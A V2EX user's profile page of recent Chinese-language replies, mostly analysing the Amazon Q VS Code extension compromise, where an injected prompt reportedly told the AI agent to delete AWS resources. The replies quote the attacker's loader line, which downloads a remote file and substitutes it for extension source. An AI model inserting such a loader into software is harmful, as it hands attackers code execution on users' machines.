 |
jqknonoV2EX 第 563739 号会员,加入于 2021-11-30 10:54:39 +08:00今日活跃度排名 16250 |
blogs.jqknono.com
jqknono 最近回复了
1 天前 回复了 hanzichi 创建的主题 › 健康 › 喉咙持续痒了一个多月了,有没有这样的朋友? |
慢炎舒宁含片, 我含这个睡第二天早上就不会喉咙痛, 可以试试, 对我很管用
3 天前 回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词 |
@skiy 我的意思是 reset hard 加 force push, 这样就没有恶意文件的痕迹. 否则一个公开库泄露了 accesskey, 岂不是没法彻底清理提交的内容了?
3 天前 回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词 |
3 天前 回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词 |
为避免已更新到 v1.84.0 的用户被攻击, 无论如何 v1.84.0/extensionNode.bk 必须要删除, 否则已发布的代码会下载: https://raw.githubusercontent.com/aws/aws-toolkit-vscode/amazonq/v1.84.0/scripts/extensionNode.bk 替换 extensionNode.ts 然后执行.
也就是说 amazon 无论如何都要 force push 一次, 清掉 extensionNode.bk 这个文件.
extensionNode.bk 是否曾经真实存在过, 已成悬案.
但这行代码痕迹仍在,
downloadFiles([`https://raw.githubusercontent.com/${REPO_NAME}/${TAG_NAME}/scripts/extensionNode.bk`], "src/", "extensionNode.ts")
也就是说 amazon 无论如何都要 force push 一次, 清掉 extensionNode.bk 这个文件.
extensionNode.bk 是否曾经真实存在过, 已成悬案.
但这行代码痕迹仍在,
downloadFiles([`https://raw.githubusercontent.com/${REPO_NAME}/${TAG_NAME}/scripts/extensionNode.bk`], "src/", "extensionNode.ts")
3 天前 回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词 |
@codehz @turygo @leir 给各位补充了代码库分析. 能实锤的是这个提交: https://github.com/aws/aws-toolkit-vscode/commit/678851bbe9776228f55e0460e66a6167ac2a1685
攻击者完成了第一步, 后续需要将恶意代码写到 extensionNode.bk, 可惜现在的确没有第二次提交的实证了.
medium.com 提到使用"Commit Trail"来确认第二次的提交, 需要在事发前后同步过该库的人查看, 新下载的 tag 已经看不到 extensionNode.bk 的提交.
@skiy 感谢分享, force push 是这个: https://github.com/aws/aws-toolkit-vscode/compare/215b32058086bb20bd2edc33c3d0dd624df1f449...4160c5baf630368edab09f7828f9d0f8ace6b527
force push 后 extensionNode.bk 的新建和删除记录就都没了.
攻击者完成了第一步, 后续需要将恶意代码写到 extensionNode.bk, 可惜现在的确没有第二次提交的实证了.
medium.com 提到使用"Commit Trail"来确认第二次的提交, 需要在事发前后同步过该库的人查看, 新下载的 tag 已经看不到 extensionNode.bk 的提交.
@skiy 感谢分享, force push 是这个: https://github.com/aws/aws-toolkit-vscode/compare/215b32058086bb20bd2edc33c3d0dd624df1f449...4160c5baf630368edab09f7828f9d0f8ace6b527
force push 后 extensionNode.bk 的新建和删除记录就都没了.
3 天前 回复了 jqknono 创建的主题 › 程序员 › Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词 |
8 天前 回复了 blababa 创建的主题 › 程序员 › qwen code 可以平替 gemini cli 了吗 |
@zaqzhin 我用第二天了, claude api 的价格我也见识过, 所以我说 qwen3 很便宜. 见到都是抱怨扣了几十块的, 偶尔有扣了一两百的, 这些已经足够说明 qwen3 的便宜了.
8 天前 回复了 blababa 创建的主题 › 程序员 › qwen code 可以平替 gemini cli 了吗 |
8 天前 回复了 blababa 创建的主题 › 程序员 › qwen code 可以平替 gemini cli 了吗 |
qwen3 code 不仅不贵, 而且算比较便宜的, 说贵的是跟谁比较的呢?
)
)
这价格都是公开的, 一般在 3w-25w 这档, 阿里云的缓存是 40%的价格.
)
用 claude 何曾有过哪个问题只扣几毛钱人民币的, 最简单问题都是几块钱人民币, 单次会话几十美元的也并不稀奇.
不能睁眼说瞎话吧.
这价格都是公开的, 一般在 3w-25w 这档, 阿里云的缓存是 40%的价格.
用 claude 何曾有过哪个问题只扣几毛钱人民币的, 最简单问题都是几块钱人民币, 单次会话几十美元的也并不稀奇.
不能睁眼说瞎话吧.
9 天前 回复了 jqknono 创建的主题 › 分享创造 › 阿里云 ESA 边缘函数转发代理 docker registry |
实话实说, 比 cloudflare 慢很多, 不过写都写了, 就发上来给大家玩玩, 研究下 ESA 可以怎么折腾.
Cloudflare : https://github.com/jqknono/cloudflare-registry-proxy
阿里云 ESA: https://github.com/jqknono/esa-registry-proxy
Cloudflare : https://github.com/jqknono/cloudflare-registry-proxy
阿里云 ESA: https://github.com/jqknono/esa-registry-proxy
Select Language